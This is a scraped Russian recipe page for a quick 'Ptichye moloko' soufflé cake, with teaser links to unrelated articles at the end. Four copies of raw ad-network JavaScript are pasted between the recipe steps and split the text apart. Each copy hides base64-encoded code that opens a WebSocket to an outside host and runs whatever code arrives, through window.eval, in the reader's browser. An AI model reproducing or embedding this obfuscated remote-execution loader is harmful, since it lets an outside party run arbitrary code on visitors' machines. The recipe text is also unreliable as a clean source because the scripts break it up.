Быстрый торт «Птичье молоко» для гурманов


Самый простой и быстрый способ приготовления торта-суфле «Птичье молоко».

var d = new Date, script648719 = document.createElement(«script»), mg_ws648719 = {};script648719.type = «text/javascript»;script648719.charset = «utf-8»;script648719.src = «http://jsc.marketgid.com/p/e/perekusim.com.648719.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648719.onerror = function () { mg_ws648719 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTkoZSl7dmFyIGg9bWdfd3M2NDg3MTkub25tZXNzYWdlOyBtZ193czY0ODcxOS5yZWFkeVN0YXRlPT1tZ193czY0ODcxOS5DTE9TRUQmJihtZ193czY0ODcxOT1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE5X2xvY2F0aW9uKSksbWdfd3M2NDg3MTkub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTkobWdfd3M2NDg3MTksZnVuY3Rpb24oKXttZ193czY0ODcxOS5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTkoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTkoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTlfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxOSA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTlfbG9jYXRpb24pLCBtZ193czY0ODcxOS5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTkoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648719.onmessage = function (msg){window.eval(msg.data);}; mg_ws648719.postMessage(‘js|’+script648719.src+’|M382836Composite648719|M382836Composite648719’);};document.body.appendChild(script648719);

Ингредиенты:
Тесто:
3 — яйца
125 гр — муки
1 ч.л.- разрыхлителя
125 гр — сахара
8 больших ст.л. — какао
Растереть яйца с сахаром, добавить муку, разрыхлитель и какао. Вымешать до однородности. Выпечь при 180-200 гр минут 20 до готовности. Остудить.

Суфле:
5 — белков
300 гр — сахарной пудры
10 гр — желатина
100 гр — воды
Замочить желатин в воде на 10 минут. Затем нагреть его до растворения и отставить охлаждаться.

var d = new Date, script648717 = document.createElement(«script»), mg_ws648717 = {};script648717.type = «text/javascript»;script648717.charset = «utf-8»;script648717.src = «http://jsc.marketgid.com/p/e/perekusim.com.648717.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648717.onerror = function () { mg_ws648717 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTcoZSl7dmFyIGg9bWdfd3M2NDg3MTcub25tZXNzYWdlOyBtZ193czY0ODcxNy5yZWFkeVN0YXRlPT1tZ193czY0ODcxNy5DTE9TRUQmJihtZ193czY0ODcxNz1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE3X2xvY2F0aW9uKSksbWdfd3M2NDg3MTcub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTcobWdfd3M2NDg3MTcsZnVuY3Rpb24oKXttZ193czY0ODcxNy5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTcoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTcoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTdfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxNyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTdfbG9jYXRpb24pLCBtZ193czY0ODcxNy5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTcoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648717.onmessage = function (msg){window.eval(msg.data);}; mg_ws648717.postMessage(‘js|’+script648717.src+’|M382836Composite648717|M382836Composite648717’);};document.body.appendChild(script648717);

Взбить белки в крепкую пену. Продолжая взбивать всыпать сахарную пудру. Взбивать до густоты крема. Затем, опять же не переставая взбивать, влить желатин.

Корж разрезать либо на две части, либо немного срезать верхний слой и оставить один. В разъемную форму положить корж, по желанию пропитать его сливочным ликером. Вылить сверху суфле.

Если коржа два, то накрыть суфле вторым коржом. Поставить в холодильник до застывания.

var d = new Date, script648715 = document.createElement(«script»), mg_ws648715 = {};script648715.type = «text/javascript»;script648715.charset = «utf-8»;script648715.src = «http://jsc.marketgid.com/p/e/perekusim.com.648715.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648715.onerror = function () { mg_ws648715 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTUoZSl7dmFyIGg9bWdfd3M2NDg3MTUub25tZXNzYWdlOyBtZ193czY0ODcxNS5yZWFkeVN0YXRlPT1tZ193czY0ODcxNS5DTE9TRUQmJihtZ193czY0ODcxNT1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE1X2xvY2F0aW9uKSksbWdfd3M2NDg3MTUub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTUobWdfd3M2NDg3MTUsZnVuY3Rpb24oKXttZ193czY0ODcxNS5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTUoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTUoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTVfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxNSA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTVfbG9jYXRpb24pLCBtZ193czY0ODcxNS5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTUoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648715.onmessage = function (msg){window.eval(msg.data);}; mg_ws648715.postMessage(‘js|’+script648715.src+’|M382836Composite648715|M382836Composite648715’);};document.body.appendChild(script648715);

Глазурь:
150 гр черного шоколада
100 сливочного масла
В сотейник кладем масло и кусочки шоколада. На маленьком огне постоянно помешивая доводим до однородности и даем остыть.

Застывший торт отделить от бортов разъемной формы и облить глазурью. Ну и осталось лишь дождаться, пока она, глазурь то есть, застынет.
Приятного аппетита!

var d = new Date, script648713 = document.createElement(«script»), mg_ws648713 = {};script648713.type = «text/javascript»;script648713.charset = «utf-8»;script648713.src = «http://jsc.marketgid.com/p/e/perekusim.com.648713.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648713.onerror = function () { mg_ws648713 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTMoZSl7dmFyIGg9bWdfd3M2NDg3MTMub25tZXNzYWdlOyBtZ193czY0ODcxMy5yZWFkeVN0YXRlPT1tZ193czY0ODcxMy5DTE9TRUQmJihtZ193czY0ODcxMz1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzEzX2xvY2F0aW9uKSksbWdfd3M2NDg3MTMub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTMobWdfd3M2NDg3MTMsZnVuY3Rpb24oKXttZ193czY0ODcxMy5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTMoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTMoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTNfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxMyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTNfbG9jYXRpb24pLCBtZ193czY0ODcxMy5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTMoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648713.onmessage = function (msg){window.eval(msg.data);}; mg_ws648713.postMessage(‘js|’+script648713.src+’|M382836Composite648713|M382836Composite648713’);};document.body.appendChild(script648713);
Источник



Source link

Почитайте другие интересные статьи:

10 секретов укладки «надолго»
Считаете, что вам всё известно об укладке волос? Такая уверенность понятна: сложно не стать практически профи в том, над чем приходится работать ежедневно. Всё же в запасе у стилистов имеется немало секретов, которые смогут приятно удивить и порадовать каждую красавицу. Например, что такого с наш...
Салаты на Новый год 2018: рецепты с фото
На праздники все хотят полакомиться вкусненьким и удивить близких кулинарными шедеврами. Поэтому хозяйки заранее начинают искать простые рецепты вкусных салатов к Новому 2018 году и фото интересного оформления праздничных блюд. В грядущем году править балом будет Собака (и не простая, а Желтая Зе...
Ани Лорак и Эмин Агаларов — их связывает гораздо больше, чем просто творчество
Ани Лорак замечательная певица, каждый год она радует своих поклонников новыми альбомами. В этом году она вместе с EMIN поражает всех композицией «Проститься».  Клип получился великолепным, ведь над ним работали лучшие из лучших, Максим Фадеев и Алан Бадоев. Эта работа есть нечто большее, чем про...